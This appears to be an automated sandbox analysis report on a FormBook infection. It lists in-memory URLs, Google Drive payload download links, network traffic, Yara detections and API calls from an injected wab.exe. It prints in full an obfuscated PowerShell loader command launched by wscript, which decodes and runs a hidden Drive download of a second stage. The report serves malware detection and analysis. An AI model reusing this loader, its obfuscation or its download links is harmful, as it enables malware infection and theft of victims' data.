        Source: powershell.exe, 00000002.00000002.2177170811.000002B337C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATBP
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATBXR
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2155735479.0000000008A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=downloadf
        Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=downloadh
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2177170811.000002B33858E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi64_7500.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: amsi32_7728.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Very long command line found
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7163
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7163
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7163Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7163Jump to behavior
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247035C0 NtCreateMutant,LdrInitializeThunk,12_2_247035C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_24702C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_24702DF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24704650 NtSuspendThread,12_2_24704650
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703010 NtOpenDirectoryObject,12_2_24703010
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703090 NtSetValueKey,12_2_24703090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24704340 NtSetContextThread,12_2_24704340
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702C60 NtCreateKey,12_2_24702C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702C00 NtQueryInformationProcess,12_2_24702C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702CF0 NtOpenProcess,12_2_24702CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702CC0 NtQueryVirtualMemory,12_2_24702CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702CA0 NtQueryInformationToken,12_2_24702CA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703D70 NtOpenThread,12_2_24703D70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702D30 NtUnmapViewOfSection,12_2_24702D30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703D10 NtOpenProcessToken,12_2_24703D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702D10 NtMapViewOfSection,12_2_24702D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702D00 NtSetInformationFile,12_2_24702D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702DD0 NtDelayExecution,12_2_24702DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702DB0 NtEnumerateKey,12_2_24702DB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702E30 NtWriteVirtualMemory,12_2_24702E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702EE0 NtQueueApcThread,12_2_24702EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702EA0 NtAdjustPrivilegesToken,12_2_24702EA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702E80 NtReadVirtualMemory,12_2_24702E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702F60 NtCreateProcessEx,12_2_24702F60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702F30 NtCreateSection,12_2_24702F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702FE0 NtCreateFile,12_2_24702FE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702FB0 NtResumeThread,12_2_24702FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702FA0 NtQuerySection,12_2_24702FA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702F90 NtProtectVirtualMemory,12_2_24702F90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247039B0 NtGetContextThread,12_2_247039B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702AF0 NtWriteFile,12_2_24702AF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702AD0 NtReadFile,12_2_24702AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702AB0 NtWaitForSingleObject,12_2_24702AB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702B60 NtClose,12_2_24702B60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702BF0 NtAllocateVirtualMemory,12_2_24702BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702BE0 NtQueryValueKey,12_2_24702BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702BA0 NtEnumerateValueKey,12_2_24702BA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702B80 NtQueryInformationFile,12_2_24702B80
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886E4DC822_2_00007FF886E4DC82
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886E4CED62_2_00007FF886E4CED6
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E10105_2_084E1010
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E0CC85_2_084E0CC8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E18E05_2_084E18E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C146012_2_246C1460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478244612_2_24782446
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478F43F12_2_2478F43F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477E4F612_2_2477E4F6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478757112_2_24787571
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D053512_2_246D0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476D5B012_2_2476D5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479059112_2_24790591
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EC6E012_2_246EC6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D077012_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F475012_2_246F4750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CC7C012_2_246CC7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478F7B012_2_2478F7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247870E912_2_247870E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478F0E012_2_2478F0E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C012_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F0CC12_2_2477F0CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B16B12_2_2479B16B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF17212_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2470516C12_2_2470516C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C010012_2_246C0100
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476A11812_2_2476A118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247881CC12_2_247881CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247901AA12_2_247901AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DB1B012_2_246DB1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477027412_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247712ED12_2_247712ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EB2C012_2_246EB2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D52A012_2_246D52A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BD34C12_2_246BD34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478A35212_2_2478A352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478132D12_2_2478132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE3F012_2_246DE3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247903E612_2_247903E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2471739A12_2_2471739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24749C3212_2_24749C32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0C0012_2_246D0C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478FCF212_2_2478FCF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C0CF212_2_246C0CF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770CB512_2_24770CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24787D7312_2_24787D73
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24781D5A12_2_24781D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D3D4012_2_246D3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DAD0012_2_246DAD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CADE012_2_246CADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EFDC012_2_246EFDC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E8DBF12_2_246E8DBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0E5912_2_246D0E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478EE2612_2_2478EE26
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478EEDB12_2_2478EEDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D9EB012_2_246D9EB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478CE9312_2_2478CE93
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E2E9012_2_246E2E90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24744F4012_2_24744F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F0F3012_2_246F0F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478FF0912_2_2478FF09
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DCFE012_2_246DCFE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C2FC812_2_246C2FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478FFB112_2_2478FFB1
